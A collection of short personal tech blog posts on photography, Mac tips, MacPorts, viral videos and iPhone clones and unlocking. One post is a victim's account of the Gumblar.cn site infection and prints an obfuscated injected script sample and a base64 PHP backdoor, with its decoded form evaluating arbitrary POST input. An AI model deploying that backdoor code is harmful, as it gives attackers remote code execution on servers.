This 26 Gigapixel photo was taken in Dresden, Germany.
It feels like CTU in 24 and their satellite capture, it’s unbelievable how much details are in the photo.
It would take “Where’s Waldo” to another level.
But it is not done by 1 shot, it actually requires a lot of effort, took 172 minutes to shoot, took 94 hours to stitch 1665 images (21.4 megapixel) this 102 GB gigantic photo.

A lot of Windows user switching over to Mac seems to confuse about the green button on the top left of a window, expecting it to maximize the window to full screen. But in fact that button is really not the same maximize button as Window’s world, but rather the Zoom button which merely maximize the Window to the content.
Here is a little video that explains the differences, and as well teaches you how to create a shortcut key for it (or click here to watch my video on youtube) :

Ouch, some of my sites were attacked by Gumblar.cn exploit, and blacklisted by Google.
What it does is injecting malicious codes into .html, .php, .aspx and .js files, usually some snippet of javascript in the header right before the body tag in .html and .aspx files, and at the bottom of the .php and .js files. It will also generate a image.php and gifimg.php file in the images directory. It will do so randomly anywhere on the website. PC users visiting the site could be compromised.
First thing to do is to change ftp password, a stronger password would help. Then it takes me a long time to scrub through the sites, using scripts, search and replace, delete, ftp, to find and delete those scripts, and then about a day for Google to review the site again. Linux really help in this case in cleaning it up through command line, but not so with PC servers, where each file have to be checked manually.
Some analysis…
Here is one sample of the various injections : var maV3C='%';var nW5R='var"20a"3d"22Scri"70t"45"6eg"69ne"22"2cb"3d"22Ver"73ion()+"22"2cj"3d"22"22"2c"75"3dn"61vig"61tor

This is the backdoor script in the image.php or gifimg.php file : eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzM2MzQyYjMxMzgzNzJlMzIzMDMxMmUzMjMyMzUzYTdhNjk2MzZmNmM2MTNlNzA2NTc0NjQ3MjZjNjEnOw=='));
When decoded, here is the actual php script : if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo ‘36342b3138372e3230312e3232353a7a69636f6c613e70657464726c61′;
As you can see, it can run any php commands through that file on your server.
I needed curl to do sftp recently, and found that the curl version came with Leopard is outdated and does not have the library “libssh2″ for sftp access.
curl -V would show you what options/library was compiled with it.
Then came macport which I previously installed.
Did a “port list curl” and found the curl version available was recent enough.
then “port info curl” would show you the variants available :
curl @7.19.3 (net, www)
Variants: ares, darwin_6, doc, gnutls, gss, idn, ipv6, openldap, sftp_scp, spnego, ssl, universal
sftp is there!
So simple enough, I did a “port install curl +sftp_scp” and sit back and relax.
To break it down in english : port please install curl and add the options of +sftp_scp
How simple can it be?
Macport is available at http://www.macports.org/, I recommend everyone to get it and have it installed, it is such a handy tool.

This graffiti artist blu captured his graffiti animation which is so mind boggling, somewhat creepy, but it is a work of art. I especially love how his drawing interact with surrounding objects. The animation and accompany audio really grabs your attention, I just wonder how long it takes to complete this work. The city is his canvas…

Okay, I give him that, this Korean kid got guts and can dance, though sometimes hilariously. I am surprised even with all that exercises, he didn’t seem to have lost any weight at all!

Matt’s dance is really inspiring, and uplifting, I watched it so many times, gives you a break from any bad day, this would be a great video for kids, if you really want it, just do it. I wish I find this video some 20 years ago… =P
This video is the latest 2008 release collections of his dance all over the world, very nicely put together, notice how other people trying to mimic his goofy dance, you won’t regret watching it :
Okay, iPhone is obviously a target for cloning, here is a list of iPhone wannabe that have pop-up here and there (China is definitely the King of copyright infringements, there is nothing that can’t be copied) :
The actors in the commercial are so fake…
Here is how much the HiPhone cost : 2380 Yen, that is about US$350, but they also include a led case, a 1 GB MicroSD, as well as 30,000 movies!! I guess these movies aren’t worth anything in China.
Here is where you can actually buy some of them, but let’s face it, the REAL iPhone rulez already, why the hell would anyone wants to save 1-200 bucks for fake ones that don’t necessary works the same. Don’t forget Apple will continue innovate, with the upcoming SDK, you will start to see a big pour out of new and exciting apps! Can’t wait…
If anyone find more clones, let me know, I will post them up here…

Even though Geohot is the king of hacks, Zibri’s ZiPhone that uses Geohot’s Gunlock bundles a whole bunch of stuff into a nice simple package is the most popular iphone jailbreak/unlock out there, check out his blog : http://www.ziphone.org/
I have already seen a few 1.1.3 16gb unlock iphones around the company here.
I hope that Geohot and Zibri can just work together, stop the argument, have some fun and enjoy the ride….

Okay, this is definitely possible, and does not look too difficult, just a touch hairy when opening the case, I probably won’t have to worry about it at least a few years down the road.
Warning : Doing this is of course voids your iPhone warranty. But I guess who cares, since they don’t even sell them in Canada!
I don’t think this is widely publicized, because I did not know about it until yesterday.
